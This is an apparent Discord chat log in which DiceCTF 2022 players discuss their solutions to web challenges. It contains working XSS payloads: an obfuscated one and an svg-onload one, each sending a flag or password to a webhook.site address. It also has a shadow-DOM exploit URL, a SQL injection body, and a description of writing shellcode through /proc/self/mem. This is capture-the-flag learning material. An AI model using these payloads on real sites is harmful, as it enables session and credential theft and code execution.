#web
why wont you released the flare writeup?
shadow is so hard without a click 😭
shadow looks unsolvable...
uh...no guarantees
waiting for the solution! going to learn something new! great chals guys!
shadow does not require a 0day 😑
hahaha
no-cookies giving brain damage

gonna enjoy reading the writeups for a few of these challenges
No give us your 0days please
ok dirbusting now /j
need wp of no-cookies

maximum i got - text highlighted without css change)))

why use css when you can use whatever magic this man is on
got writeup for this?
All I got was figuring out how to get around the csp issue
yeah ill post my writeups when i finish writing them after the CTF is over
The challenges will be on after ctf ?
the challenges will stay online for a bit
hint in 4 minutes? 😉
cursed denoblog remote
man used his mouse to select text
know it existed but don't know how it exactly worked(text highlight) https://github.com/bokand/ScrollToTextFragment/blob/main/README.md
locally working exploit 😭
not the only way to select text programmatically
you can use JS to select text too
but then i need access to this text)))
hey now lets not discuss
challenges will be online for a bit
but not forever because we are using our own money
We want to test the challenges with writeups and take some notes 😄
asdjhasiudhasiudhaisuhdasuid i thinki have something for shadow but idk how to exploit
asidjoasjdoaisjd
All the XSS in no-cookies couldn't get me the damn unencrypted password 😦
Is it finally over ? 😄
gg
vm-calc writeup????
nooooooo
No Cookie please 😄
sqli and xss were not enough to solve no-cookies 😦
fakkkkkkkkkk
and notekeeper
Got my ass kicked by the web challenges, but it was pretty fun
almost solved shadow if the bot could click anywhere for once 😭
what
those 2 drove me crazy
we got the flag
30 secondsssssssss
GG!
shadow solution plz
^^ this guy
LMFAO
what was blazingfast?
literally 30 seconds
omg
pleaseee someone explain how blazingfast is solved
@candid coral which chal?
flare ? could it be done via warp and http/3? seems cloudflare fixed it
shadow
RIP
oof
blazingfast solution:
fflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflfflffl<img src=x onerror="''['\141\164']['\137\137\160\162\157\164\157\137\137']['\143\157\156\163\164\162\165\143\164\157\162']('\146\145\164\143\150(`\150\164\164\160\163://\167\145\142\150\157\157\153.\163\151\164\145/90396\1465\141-59\146\141-40\146\145-\14182\146-\145\14421\1415\14611009?Q=${\154\157\143\141\154S\164\157\162\141\147\145.\146\154\141\147}`)')()"/>
welcome to the gang
lmao
i wanna cry lol
no-cookies please
Where did you see this?
In 1 run?
Did they already released official writeups?
yea can be done in one
What is the solution for vm-calc? Is it a 0day in vm2?
yes
im still working on writeups
wait a little longer :>
but no
vm-calc was not a vm2 0day
it was a nodejs 1-day
:D
🤠
what was nocookies?
how far did u get
we got sqli + xss
That's my doubt... At least where my dumb analysis went, the mock() function would stop in the first tag opening and return 1, stopping the rest of the execution.
js moment incoming
js moment
JS MOMENT
with nocookies I got into XSS, also got sqlite3 error and dom clobbering but no idea
god i love javascript
what was shadow , that got all of my time
the fuck
lmao
basically the password is in RegExp.input 🙂
Shiiiiiiiiiiiiiiiiiiiittttttt..... I even generated a HeapDump of a XSS-ed Chrome window to look for some global object, but I couldn't find the path for it.
oh noo 😭
😔
I was trying to find a Request object with the password stored.
ahh i see
That was really great!! I'm looking forward to the writeups
mad at myself for coughing up 5$ for warp+ for flare just in case
flare solution ?
you can get free warp+ with cloudflare teams
So frustrated with denoblog, had an exploit that was reliable locally, nothing happening remotely
it didn't work for me either way
oof sorry
any carrot writeups?
@vital umbra i got into the rabbit hole due to the fact that you could specify the instance value different from the url, so the first promise wasn't resolved. Thought maybe we could somehow trigger only 1 dialog and then navigate to /register so that the bot registers with the password in the login 🙂 theoretically possible, but obviously unintended
curious about denoblog too, very interesting, even with inotify i couldn't find any other temp files or anything
At the last minutes I got the encrypted password just to check 😄 lol
So shadow writeup is first coming tomorrow?
Lol nginx moments
you had to bruteforce both pid and fd
ah I see, i was worried about that but i thought it would be okay
Like, we had the right pid/fd from nginx bc we could exfil etc/passwd
oh you could access it from a nginx worker process...?
but the shellcode didn't take
did you try to write into the ejs?
how did u write ur shellcode?
hxp include stuff + write to /proc/self/mem
that worked for us remotely
wait guys let's ask for shadow fucking stuff with no solves
after parsing /proc/self/maps
ok how about flare?
shadow solution won't be given for a week i believe
Writeup for Blazingfast please. Not sure what the vulnerability there was
why?
flare writeup ?
the length can change after toUpperCase iirc
from announcement:
thxx
the grind continues
blazingfast's vuln is the buffer didn't get cleared right?
well. now we can talk about shadow?
no
thats a vuln but it doesnt get triggered
looking for writeup 👀
how to get steal me focused?)
spend tons of time in that buffer rabbit hole
.
I'll give u that 50$ just tell me how to read that shadow dom stuff
what was the flare bug?
e.g. ß become SS when uppercase
I'm kinda curious to see how carrot was meant to be solved. We spent a lot of time trying to get CSRF + XSleaks through timing attacks to work but we weren't able to reliably time the onload
ditto
yea what was carrot
☝️
Carrot (unintended: jinja2 is super slow)
https://gist.github.com/kunte0/47c2b53535605d842f984e77d6c63eed
bruh
❤️
how long did it take you?
2 times
Now I got the detail. The password is stored in the Regexp.input by the validate function. Shit. Really nice.
Haha thanks. Sorry if it was too obscure 😅
👍
just this was missing oof
Dang, I was looking at the wrong xsleak method
btw if you want to try to do intended, reduce the request body limit to ~200k instead 😉
okay, fine
Something about flare?
flare wont happen probably
web/shadow now released
😭
ahahah
yep
@vital umbra link?
but ig thats like half the exploit lmao
damn
i thought of insertHTML
but i couldn't figure out how to get the cursor in
first time knowing there is window.find wtf
is there a writeup for knock-knock
the same. But i think more ctfs = understand more features like this
i can add an explanation into the organizer writeup page
ty
@fleet vale how did you bypass 16 char limit in notekeeper ?
exactly same
you supply an array instead of a string
here are writeups for notekeeper, vm-calc, denoblog, and larry's challenge blazingfast:
DiceCTF 2022
Hello everyone! It's been a while since I last wrote something for my blog, but I'm still here... :)
It's the new year now, and my team DiceGang noteKeeper, vm-calc, and denoblog, but I'l...
:D
GOD DAMNIT
@fleet vale also rip no one solved noteKeeper with serviceworkers
I didnt know about the cached input.
Nice to learn and brought new ideas
what did sg use?
window.opener.document.write
the secret key for the hmac was using randomUUID but didn't actually call it; so instead of it being a UUID it was just [Function function] or something like that
ah k
no it was the source code for randomUUID
yeah
because it gets converted to a string
kinda meme
but that is why exact node version was important
so docker was given
for which part?
jsonp to full javascript execution
we used opener.document.write
oh didnt see this
😭 service workers my beloved
I assumed it'd be converted to 'undefined' if that was the case
Eventually had to set up the docker to get it
😂
for denoblog, in my testing on the docker I thought that the deno process cannot read nginx's temp file
since it runs as nobody
and i got perm errors in my logs 
So no one knows about flare?
those directories were owned by root in my docker
maybe i deleted a line or something dumb in the dockerfile
ohh it's the child process
i'm dumb
where did denoblog solvers overwrite /proc/self/mem?
i just had checked nginx's parent process
we created a wasm thing, searched for the rwx page, wrote shellcode to the beginning of the page and called the wasm function
oh i see! thats really cool
it was surprisingly easy
failed solver, but worked locally We overwrote the code for deno_runtime::permissions::PermissionState::check and then try to do something else that requires permission 🙂
tried to patch it to just always return "go ahead", but couldn't be bothered to figure out the proper structure for the return value
ah i see
rip
that seems tough, i struggled along that path for like an hour before trying something else when test solving
any wp of no-cookies
We just changed seek offset until nop sled worked
Non-standard: This feature is non-standard and is not on a standards track. Do not use it on production sites facing the Web: it will not work for every user. There may also be large incompatibilities between implementations and the behavior may change in the future.
this is what you love to see
tried a nop sled too in the final minutes, still didn't work :/
on top of a mdn doc
i was scared it would get patched out
Were you crashing the backend?
Somehow, no
We were getting nginx backend error after overwrite
How do you know you were hitting right pid?
We could exfil /etc/passwd with a different payload

so the sqli in nocookie was useless
with markdown you couldnt use RegExp.input since it would overwrite :)
a[d](b"onfocus=alert`23` autofocus tabindex=1 ")z
lol we didnt even find that
the markdown xss was kind of an accident
i added a markdown mode to justify innerHTML and i let copilot write a bootleg markdown renderer
copilot moment
and that introduced xss, but i left it in because it was kinda funny
because you can't do the RegExp.$_ thing after
copilot traaaash
copilot == backdoor stuffs
this was all copilot lol
Flare writeup?
🙏 copilot keeping our jobs secure
so try to write more vuln code in your github page
ok time to find real author of the markdown writer and get some xss bounties on websites he developed
🧠 ...
Promise share bounties with me 🙂
you go try find the sqli author if that was also built with copilot
requires a cloudflare 0day
oOoOo yesss sqli has more bounties
i figured you somehow need to get the origin IP
i suppose you could just try all public IPs to find the origin IP then directly connect and set CF-Connecting-IP?
how?
/proc/self/mem
++
Nope, seemed like it was verifying CF mTLS
yeah i was thinking of just fuzzing that header with all ipv4 but I think that level of requests would be against rules
well actually you'd be fuzzing CF so prob fine
CF can eat any amount of spam you can possibly create on your own
but no that is not the way

that sounds like a fast way to get cloudflare to start dropping all requests from your IP
i believe it was something like this too
hoping for a writeup though
I tried CNAMEing to flare.mc.ax from a Cloudflare domain I control but CF has a special error for that: http://no.cogzap.com/
i know how i got the flare flag but i don't know why it's working
🙃
what did you try?
huh hm
erm, tried warp, didn't work for me
try disabling your native IPv4 and connect to WARP with IPv6 only?
LOL
lmao
ah, so it's ipv6, alright

i even connected an aws instance with ipv6 to warp but then got distracted lol

lol
well it's already public, you can find people complaining about this stuff
smh why did you make it a chall then if you didnt want it leaked
the audience was different
well, some lucky but poor BGP Player has only IPv6 access for his VMs
🙃
I accidentally brought it to the wrong audience
but i tried to re-create this challenge and failed
was the solution warp?
i dont really know what's required for setting up on cloudflare side
nothing required
you can't reproduce
if your backend is ipv6
this only works because of the ipv6 -> ipv4 interaction cloudflare
yes
so I do have it pointed to an ipv4 server
this is with this option on
its not technically private
i have no idea why python thinks its private
its Class E
A classful network is a network addressing architecture used in the Internet from 1981 until the introduction of Classless Inter-Domain Routing in 1993. The method divides the IP address space for Internet Protocol version 4 (IPv4) into five address classes based on the leading four address bits. Classes A, B, and C provide unicast addresses for...
they're bogons
Class E is reserved and cannot be used on the public Internet.
but technically just because they're "not public" doesn't mean they're private 
those are two different things by classful network definition

well it's reasonable enough then
its reasonable enough
but <insert IEEE/RFC standard here>
yeah
there are specific defined private-use networks tho
https://datatracker.ietf.org/doc/html/rfc8962
Cloudflare: we perfectly executed this RFC
Establishing the Protocol Police (RFC )
shadow writeup?
linked in #announcements and #writeups
what was the no-cookies writeup @vital umbra? during ctf i successfully found xss, but did not know how to steal the flag
earlier conversation up here
lol i havent used regexp thing
<svg><svg/onload="document.querySelector=function(){JSON.stringify=a=>fetch(`https://webhook.site/11b32903-2d6a-4efc-b687-e06a0f0226aa?`+a.password),arguments.callee.caller()}">
i have replaced JSON.stringify with my own function
and called this funcion
using arguments.callee.caller
good thing it was separated from prompts lol
i still used sqli tho lol
wtf lmao
honestly i wasnt expecting html to parse and script to run before executing line 60
but it worked XD
oh holy shit
i thought is intended solution as this function was separated
the js executed before line 60???
holy
yeah how did it...?
idk lol i guess parsing html after changing innerHTML is sync
or javascript is super slow XD
thanks @ivory pike , i did not know that we could also use local variables of an anonymous function.
we couldnt use it i replaced JSON.stringify as it was called
with password
as argument
in line 30
no doubt you are the same guy @ivory pike , https://twitter.com/disclosedh1/status/1425219239351365636?s=20&t=PAjViahKCWiDDJhf-GvaGQ
Valve disclosed a bug submitted by drbrix: https://t.co/6ZtNQs5Y5W - Bounty: $7,500 #hackerone #bugbounty
344
that was an exceptional finding ❤️🔥
👏
whoa this is so cool
😎
But there is await for json(), isn't it?? how could the innerHTML be changed before JSON.stringify()?
it was changed after it
but i called anonymous function again
arguments.callee.caller()
so JSON.stringify was called again
with password
how could that sqli be used to xss? I only know the markdown one
oh arguments.callee.caller() is not a part of JSON.stringify(), I parsed it falsely
ty for your resp
but <> will be removed
ye use sqli to do that
i think my payload looked like this:
```json
{
  "password": "pass",
  "note": ", :mode, 0, 0) -- ",
  "mode": "actual note and xss"
}
```
(POST to /create)
and mode was used as note content
Didn't you find the markdown xss or that wouldn't work?
Any writeup for flare?
smh such 🧀
this guy 🙂
Ladies and gentlemen we just missed solving and sending flag for shadow (0 solves) challenge in dice ctf by 30 seconds after the ctf ended @parrot409
actually, we got $50 instead of a notification... maybe it was all planned 

:hackerman: 😋
Why does that give you the anonymous function though? Since it isn’t really calling you right?
Ah I see how it works now
yeah realized that now, really smart!
btw why do you need the onload in that weird spot? I couldnt get it to work otherwise. img onerr was also called "too late". Did you just randomly figure that out or is there some logic to that?
any writeup for shadow
any writeup for flare?
ty
Super guesser also just posted a more detailed writeup #writeups message
Any idea why svg can read the parent element but img can't?
my guess is that the nested svg is parsed in a different mode (svg mode, not html mode) and thats why it behaves differently
but i guess you have to read the html spec to know for sure
I don't know the exact reason but yeah
just looked at my test solve
seems to work with an img tag for me 
https://shadow.mc.ax/?y=-webkit-user-modify:read-write;&x=%3Cimg%20src=x%20onerror=%27document.execCommand(%22FindString%22%2C%20false%2C%20%22steal%22)%3B%20document.execCommand(%22SelectAll%22)%3B%20document.execCommand(%22insertHTML%22%2C%20false%2C%20%60%3Cimg%20src%3Dx%20onerror%3D%22alert(this.parentNode.parentNode.outerHTML)%22%20%2F%3E%60)%3B%27/%3E
ig you just need to get the 2nd parent if using img tag?
I was having issues when I originally tried using an img tag too but I don't remember the reason
i guess img onerror is loaded async as it needs response from server to run handler onload/onerror
and i just asked @plush quest does he know any xss payload
and he send me svg onload xD
hmm yeah
Still not sure of the exact reason here
I think the img tag is being removed from dom before onerror is fired unless you do SelectAll?
Could be totally wrong
yeah that might be it
it just seems to not have any parent
weird
this is what the dom looks like without the SelectAll
this and the $0 img tag in the elements tab somehow are different elements?
wack
wait how tf did i find document.execCommand "FindString"
thats not even documented
i love js
oh wait @knotty tinsel how did u find that lmao
maybe it's more like a hidden feature only implemented by webkit and blink, it's mentioned here: https://w3c.github.io/editing/docs/execCommand/#:~:text=will bear investigation.-,findString,-%2C fontSizeDelta%2C insertNewlineInQuotedContent%2C justifyNone
iirc arx found it in chrome source lol
yea
Are you using node 17.4.0?
Oh, no
I have upgraded and still not working
index.js :
I'd guess because you're on Windows
❯ cat index.js
const crypto = require('crypto');
console.log(crypto.createHmac('sha256', `secret-${crypto.randomUUID}`).update('0').digest('hex'))
❯ /usr/local/bin/node -v
v17.4.0
❯ /usr/local/bin/node index.js
7bd881fe5b4dcc6cdafc3e86b4a70e07cfd12b821e09a81b976d451282f6e264
whats the output of
```js
`secret-${crypto.randomUUID}`
```
might be line endings?
I think it's \r\n on Windows, because I can reproduce 1ac7056f7beb7929213e625824620dbda59bd519c706fda69f9aca1bd914c175 after replace all \n to \r\n
```js
console.log(
  crypto.createHmac('sha256',
    `secret-${crypto.randomUUID.toString().replaceAll('\n', '\r\n')}`)
  .update('0').digest('hex')
)
```
ohh i see then i could have gotten my answer like this
Thanks!
i mean you should really have ran the docker image though
then you don't need to deal with platform-specific issues like that
FWIW, https://github.com/traefik/traefik/security/advisories/GHSA-hrhx-6h34-j5hc was what i used for flare
Unintended 0day be like 
@feral hill 👀